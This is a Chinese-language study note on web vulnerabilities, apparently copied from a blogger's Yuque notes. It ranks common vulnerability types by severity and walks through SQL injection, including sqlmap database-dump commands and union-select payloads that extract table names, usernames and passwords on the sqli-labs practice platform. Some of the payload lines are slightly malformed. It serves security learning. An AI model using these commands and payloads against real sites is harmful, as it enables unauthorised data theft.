🌟🌟笔记来源📒：11.WEB漏洞——SQL注入之必懂知识点 · 语雀

（这个博主笔记写的太详细了，看他的比看我自己的还有用，借用方便日后复习）

一、web漏洞必懂知识点

1、常见web漏洞的危害⚠️

（1）、sql注入

（2）、xss

（3）、xxe🌟

（4）、文件上传

（5）、文件包含

（6）、文件读取

（7）、csrf（用户请求伪造）

（8）、ssrf（服务器端请求伪造）

（9）、反序列化

（10）、代码执行

（11）、逻辑漏洞

（12）、未授权访问

        敏感信息泄漏

（13）、命令执行

（14）、目录遍历

2、等级划分

（1）高危漏洞：

        SQL注入、文件上传、文件包含、代码执行、未授权访问、命令执行。

        影响：直接影响到网站权限和数据库权限，能够获取数据或者网站的敏感文件。涉及到数据安全和权限的丢失都为高危漏洞。

（2）中危漏洞

        反序列化、逻辑安全。

（3）低危漏洞

        XSS跨站、目录遍历、文件读取

        影响：网站的源码，网站部分账号密码

3、应用

       （ pikachu漏洞练习平台，gihub下载源码，phpstudy搭建）

        CTF：SQL注入、文件上传、反序列化、代码执行；

        SRC：图片上漏洞都能出现，逻辑安全出现比较多；

        红蓝对抗：涉及的高危漏洞，文件上传、文件包含、代码执行、命令执行。

二、sql注入

1、简要sql注入

（1）sql注入产生原理：

        1）对用户输入的参数没有进行严格过滤（如过滤单双引号 尖括号等），就被带到数据库执行，造成了SQL注入；

        2）使用了字符串拼接的方式构造SQL语句。

（2）sql注入分类：

        1）按注入手法分类可以分为：联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入

        2）按数据类型上可以分为：字符型（即输入的输入使用符号进行过滤）、数值型（即输入的输入未使用符号进行过滤）

        3）从注入位置可以分类为：GET数据（提交数据方式为GET，大多存在地址栏）、POST数据（提交数据方式为POST，大多存在输入框中）、HTTP头部（提交数据方式为HTTP头部）、cookie数据（提交数据方式为cookie）

（3）sql注入危害：

（4）前置知识

        1）在MYSQL5.0以上版本中，MYSQL存在一个自带数据库名为information_schema，它是一个存储记录有所有数据库名，表名，列名的数据库，也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。

        2）数据库中符号"."代表下一级，如xiaodi.user表示xiaodi数据库下的user表名。

        3）参数：

                information_schema.tables：记录所有表名信息的表

                information_schema.columns：记录所有列名信息的表

                table_name：表名

                column_name：列名

                table_schema：数据库名

                user()  查看当前MySQL登录的用户名

                database() 查看当前使用MySQL数据库名

                version() 查看当前MySQL版本

（5）注入点判断

（6）sql注入步骤：

        1）注入语句

        2）sqlmap利用        

                a）获取数据库名

        get型：python sqlmap.py -u "url" --cookie="" --dbs --batch 

        post型：  python sqlmap.py -u "url" --cookie="" --data="payload值" --dbs --batch       

               b）获取表名

        get型：python sqlmap.py -u "url" --cookie="" -D 数据库名 --tables --batch

        post型：python sqlmap.py -u "url" --cookie="" --data="payload值" -D 数据库名 --tables --batch

               c）获取表内信息

        get型：python sqlmap.py -u "url" --cookie="" -D 数据库名 --tables -T 表名 --dump --batch

        post型：python sqlmap.py -u "url" --cookie="" --data="payload值" -D 数据库名 --tables -T 表名 --dump --batch

（7）演示

        （推荐sqlilabs平台练习，专门的sql注入练习平台）

        法一、sql注入语句

        1）测试：

                //输入特殊字符网页出现错误，说明带数据库查询有注入点，存在sql注入漏洞，经过尝试，发现单引号可将语句闭合，网页对#进行url转义，使用%23代替，注释掉后面的语句

        2）order by查询列数：

                3列不报错，4列报错，所以有3列

        3）联合查询，查询数据库名称（使用联合查询，需要将前面查询的内容改为不可能情况）：

union select 1,2,3

                第一列不显示，因此在2或3列查询数据库名称：

union select 1，database(),3

        4）联合查询数据库表名

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%

        5）查询表中敏感列信息：

union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')

         6）进一步查询列中敏感信息，如username、password

union select(group_concat(username,password) from users)

2、mysql注入

3、类型及提交注入

4、oracle、mangodb注入等

5、查询方式及报错盲注

6、二次、加解密、dns等注入

7、堆叠及waf绕过注入

8、sqlmap绕过waf

三、文件上传